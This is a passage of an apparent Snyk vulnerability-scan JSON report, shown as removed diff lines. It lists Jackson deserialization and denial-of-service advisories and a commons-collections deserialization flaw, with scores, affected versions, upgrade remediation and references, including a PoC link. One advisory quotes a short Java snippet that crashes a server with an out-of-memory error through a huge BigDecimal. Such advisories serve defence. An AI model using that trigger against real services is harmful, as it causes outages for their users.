Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19362" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c8hm-7hpq-7jhg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:19.256477Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.043196Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.593938Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19360" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f9hv-mg5h-xcw9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:23.673097Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:34.457712Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.548577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19361" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx9v-gmh4-mgqw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:31.715185Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:43Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.091904Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Alessio Soldano" - ], - "semver": { - "vulnerable": [ - "[,2.8.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", - "className": "UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", - "className": "ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/pull/322", - "title": "GitHub PR" - }, - { - "url": "https://issues.jboss.org/browse/JBEAP-6316", - "title": "Jira Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:01.546686Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-01-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:01.546686Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-core@2.8.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "gmethwin@github" - ], - "semver": { - "vulnerable": [ - "[2.3.0-rc1,2.7.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", - "className": "UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", - "className": "WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-core/issues/315", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:48.004490Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-08-25T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:55:48.004490Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-core@2.7.7" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in 